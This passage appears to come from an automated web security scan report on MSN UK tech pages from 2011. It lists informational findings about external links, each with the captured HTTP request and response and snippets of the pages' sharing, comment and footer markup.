src="http://estb.msn.com/i/85/59DAE3AC143A3D9ECF2F375FBF1EBA.png" width="16" height="16" alt="Share this page on MySpace" />...[SNIP]... <li class=" jspopup"><a href="http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&h=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Newsvine" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/65/B9C2369C5C6C5BA049C34D1F79594.png" width="16" height="16" alt="Share this page on Newsvine" />...[SNIP]... <li class=" jspopup"><a href="http://www.reddit.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Reddit" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/EF/40D0FC9056526E4B5AD585674B335B.png" width="16" height="16" alt="Share this page on Reddit" />...[SNIP]... <li class=" jspopup"><a href="http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&title=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Stumbleupon" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/31/308235FD5523ECAFB8D864EAFCF570.gif" width="16" height="16" alt="Share this page on Stumbleupon" />...[SNIP]... <li class=" jspopup"><a href="http://www.technorati.com/faves?add=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778" title="Share this page on Technorati" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/2E/5AF3E3DE428277901BD070D694686B.gif" width="16" height="16" alt="Share this page on Technorati" />...[SNIP]... <li class=" jspopup"><a href="http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778" title="Share this page on Twitter" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/33/8C170158BB1EC51A16272BCD6F71C.gif" width="16" height="16" alt="Share this page on Twitter" />...[SNIP]... <li class="last jspopup"><a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778&t=Spam+capitals+of+the+world+-+Latest+Microsoft+features%2c+Windows+Phone%2c+Internet+Explorer%2c+Hotmail%2c+Messenger+%7c+MSN+UK+Tech+%26+Gadgets" title="Share this page on Yahoo! My Web" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/B0/B5F992DCBB333A2421AAB18CB173.gif" width="16" height="16" alt="Share this page on Yahoo! My Web" />...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X3F3IwbbQila-ltnM_6bX6QexNUuGaD7J?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-173f68e1861ab75e.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> gordon young ..(ChampMira) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-173f68e1861ab75e.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://byfiles.storage.msn.com/static/16" />...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XR9IfHdLBhb6q52c9o0pPDsr7RSHBMC9m?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XSvp5jen-KEEYNwn_G5Of6cyj03XfQsOQ?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X0iaAXtuYE5N72pVZf0NM1lNXsm75sett?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-7b3b72cc82d94835.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> mike downes ..(mikey baby1944) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-7b3b72cc82d94835.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <div class="ic-pst-body ic-cmt-en">It didn't mention Nigeria because that's where the damn group were staying, in a spam-free residence somewhere in the outback<img src="http://eu.social.s-msn.com/s/images/emoticons/shades_smile.gif" alt="Hot" class="emoticon" /> </div>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X8QsEQ37-rY7FcXcbfIITpyvvQbemsUs4?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/Xs2axLyYYpTI6GjTVnrDk7703ciyT8nbS?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/Xv56WTanfviyVV9LAKf_77ADV23HhtScd?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/Xv56WTanfviyVV9LAKf_77ADV23HhtScd?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... NKS BIG,THE PEOPLE GOT BIG EGOS,BUT HOPING NOT ALL AMERICANS ARE LIKE THAT!! PROBLEM IS MOST YOUNGSTERS APING THEIR BEHAVIOUR,AS IF THEY ARE OUR BETTERS.ALL THIS NEGATIVISM GOT TO GET RID OF.<img src="http://eu.social.s-msn.com/s/images/emoticons/sad_smile.gif" alt="Sad" class="emoticon" />  </div>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/Xv56WTanfviyVV9LAKf_77ADV23HhtScd?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... </span> FOR TAT!!!<img src="http://eu.social.s-msn.com/s/images/emoticons/teeth_smile.gif" alt="Open-mouthed" class="emoticon" /> </p>...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-272a9618db5e76f7.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> stephen connor ..(Honest Charlie) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-272a9618db5e76f7.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X_vnL3RyaX5-ht_-ev5lWhpRY_tWC6M0y?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <div class="ic-pst-body ic-cmt-en"><img src="http://eu.social.s-msn.com/s/images/emoticons/sad_smile.gif" alt="Sad" class="emoticon" />  we're all doomed!!</div>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XpmPNKxYWGeEtG7e7KHpNIzGd9zUto2y4?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XA3b8Uuiy8KOdv0ATMXtfudlQjUTEvce1?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/XYcK50lc-1j865GJl4nJKnMxmlOAH9Hg7?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <a class="ic-usr-pro-url" href="http://uk.social.msn.com/profile/X4ddHjyp7dTuDw2Z3yj93OTDP-KYCtB8z?mkt=en-gb"><img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... kidding yourselfs that u are not becos u control the press and the geopolitical stage! but watch out china et al are on the rise given time u lots will be cleaning the streets of beijing and lagos lol<img src="http://eu.social.s-msn.com/s/images/emoticons/teeth_smile.gif" alt="Open-mouthed" class="emoticon" /> </div>...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-6a467760f2b80189.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> John Heller ..(Aunt Ethel) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-6a467760f2b80189.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://blufiles.storage.msn.com/y1mUj917XjbFuDY0pIQz5XUgL8q8cem5gvI1NjG5SAIoG9C0CPpOP4hWB4Tpy3TF4KKXuGOd3Gp3EK4HgbrBVv4cA" />...[SNIP]... <div class="ic-usr-nm"><a href="http://cid-edd15d6c58b72d56.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> Kevin Hayton ..(HoraceWimp) </a>...[SNIP]... <div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-edd15d6c58b72d56.profile.live.com/msn/posts?mkt=en-gb&domain=en-gb"> <img alt="avatar" src="http://eu.social.s-msn.com/s/images/bluemannxl.png" /> </a>...[SNIP]... <span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behaviour. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window"> Code of Conduct</a>...[SNIP]... <li><a href="http://twitter.com/winlivematt"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @winlivematt on Twitter (Twitter)" /></a><a href="http://twitter.com/winlivematt"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/windowslivechannel"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/windowslivechannel"> <strong>...[SNIP]... <li><a href="http://twitter.com/winlivematt"> <img src="http://estb.msn.com/i/85/C1692A652543F43849DE8DC84C787.jpg" width="135" height="81" alt="Follow Matt Farrington-Smith on Twitter" /></a><a href="http://twitter.com/winlivematt"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.10. http://tech.uk.msn.com/phones/articles.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/phones/articles.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://del.icio.us/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://digg.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 http://go.microsoft.com/fwlink/?LinkId=74170 http://mail.live.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://spaces.live.com/blogit.aspx?title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&sourceurl=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&description=HTC+Salsa http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 http://twitter.com/msntech http://twitter.com/share http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104 http://www.bing.com/maps/ http://www.bing.com/search?q=Buy+Xbox+360+slim&form=MSN104 http://www.bing.com/search?q=Digital+camera&form=MSN104 http://www.bing.com/search?q=HD+Television&form=MSN104 http://www.bing.com/search?q=Laptops&form=MSN104 http://www.bing.com/search?q=internet+explorer+9&form=MSN104 http://www.bing.com/search?q=iphone&form=MSN104 http://www.bing.com/search?q=mobile+broadband&form=MSN104 http://www.bing.com/search?q=windows+phone+7&form=MSN104 http://www.facebook.com/msnuktech http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&labels=HTC+Salsa http://www.messengergonemobile.com/ http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&c=HTC+Salsa http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&h=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://www.reddit.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK http://www.technorati.com/faves?add=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 http://www.techradar.com/ http://www.techradar.com/reviews/phones/mobile-phones/htc-salsa-930923/review http://www.twitter.com/MSNTechVerity http://www.twitter.com/msntechnik http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376443&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fphones%2Farticles.aspx%3Fcp-documentid%3D158307155&lc=2057&id=1184
Request
GET /phones/articles.aspx?cp-documentid=158307155 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/reviews/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/reviews/%2526oid%253Dhttp%25253A//tech.uk.msn.com/phones/articles.aspx%25253Fcp-documentid%25253D158307155%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA32 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:43 GMT ntCoent-Length: 93357 Content-Length: 93357 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376443&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fphones%2Farticles.aspx%3Fcp-documentid%3D158307155&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <p class="partnerlogo cf"><a href="http://www.techradar.com"> <img src="http://estb.msn.com/i/D0/DBE287CB873556C222FCAEF931EE2A.gif" width="100" height="40" alt="TechRadar.com (Copyright ..Future Publishing)" />...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <p>See related stories from <a href="http://www.techradar.com/reviews/phones/mobile-phones/htc-salsa-930923/review"> techradar.com</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <li class="first jspopup"><a href="http://del.icio.us/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Del.icio.us" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/53/B85B6DFFC77EF9D86D931DDD3BDEC2.gif" width="16" height="16" alt="Share this page on Del.icio.us" />...[SNIP]... <li class=" jspopup"><a href="http://digg.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155" title="Share this page on Digg" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/28/77813148B142EF4F4DCEE7372FC215.jpg" width="16" height="16" alt="Share this page on Digg" />...[SNIP]... <li class=" jspopup"><a href="http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Facebook" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/FB/2B2C772B1EAFB0B6D239B186342DCD.gif" width="16" height="16" alt="Share this page on Facebook" />...[SNIP]... <li class=" jspopup"><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&labels=HTC+Salsa" title="Share this page on Google" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/7C/87B79F50DDC866686CE934324DC987.jpg" width="16" height="16" alt="Share this page on Google" />...[SNIP]... <li class=" jspopup"><a href="http://spaces.live.com/blogit.aspx?title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&sourceurl=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&description=HTC+Salsa" title="Share this page on Live Spaces" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/D2/FF2F70CAE8D665193EC71CE3ABE168.png" width="16" height="16" alt="Share this page on Live Spaces" />...[SNIP]... <li class=" jspopup"><a href="http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK&c=HTC+Salsa" title="Share this page on MySpace" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/85/59DAE3AC143A3D9ECF2F375FBF1EBA.png" width="16" height="16" alt="Share this page on MySpace" />...[SNIP]... <li class=" jspopup"><a href="http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&h=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Newsvine" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/65/B9C2369C5C6C5BA049C34D1F79594.png" width="16" height="16" alt="Share this page on Newsvine" />...[SNIP]... <li class=" jspopup"><a href="http://www.reddit.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Reddit" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/EF/40D0FC9056526E4B5AD585674B335B.png" width="16" height="16" alt="Share this page on Reddit" />...[SNIP]... <li class=" jspopup"><a href="http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&title=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Stumbleupon" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/31/308235FD5523ECAFB8D864EAFCF570.gif" width="16" height="16" alt="Share this page on Stumbleupon" />...[SNIP]... <li class=" jspopup"><a href="http://www.technorati.com/faves?add=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155" title="Share this page on Technorati" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/2E/5AF3E3DE428277901BD070D694686B.gif" width="16" height="16" alt="Share this page on Technorati" />...[SNIP]... <li class=" jspopup"><a href="http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155" title="Share this page on Twitter" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/33/8C170158BB1EC51A16272BCD6F71C.gif" width="16" height="16" alt="Share this page on Twitter" />...[SNIP]... <li class="last jspopup"><a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155&t=HTC+Salsa+-+Gadgets+Reviews+%7cTechnology+%7c+-+MSN+Tech+%26+Gadgets+UK" title="Share this page on Yahoo! My Web" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/B0/B5F992DCBB333A2421AAB18CB173.gif" width="16" height="16" alt="Share this page on Yahoo! My Web" />...[SNIP]... <li class="first"> <a href="http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104"> Classic Mobiles</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Laptops&form=MSN104"> Cheap laptops</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/search?q=mobile+broadband&form=MSN104"> Mobile broadband</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Digital+camera&form=MSN104"> Digital cameras</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104"> Top Mobile Phones</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=HD+Television&form=MSN104"> HD television</a>...[SNIP]... <li class="llcb"> <a href="http://www.bing.com/search?q=windows+phone+7&form=MSN104"> Windows Phone 7</a>...[SNIP]... <li class="llfn"> <a href="http://www.bing.com/search?q=Buy+Xbox+360+slim&form=MSN104"> New Xbox 360</a>...[SNIP]... <li class="bottom llcb"> <a href="http://www.bing.com/search?q=internet+explorer+9&form=MSN104"> Internet Explorer 9</a>...[SNIP]... <li class="last bottom llfn"> <a href="http://www.bing.com/search?q=iphone&form=MSN104"> Iphone 4</a>...[SNIP]... <li><a href="http://www.twitter.com/msntechnik"> <img src="http://estb.msn.com/i/A0/73EE55691874B316843CF17518A313.jpg" width="135" height="81" alt="Nik Taylor (MSN)" /></a><a href="http://www.twitter.com/msntechnik"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/msnuktech"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/msnuktech"> <strong>...[SNIP]... <li><a href="http://www.twitter.com/MSNTechVerity"> <img src="http://estb.msn.com/i/70/46399762CCCE49B80C97A5539134.jpg" width="135" height="81" alt="Verity Burns (MSN)" /></a><a href="http://www.twitter.com/MSNTechVerity"> <strong>...[SNIP]... <li class=" cb"><a href="http://twitter.com/msntech"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @msntech on Twitter (Twitter)" /></a><a href="http://twitter.com/msntech"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.11. http://tech.uk.msn.com/phones/articles.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/phones/articles.aspx
Issue detail
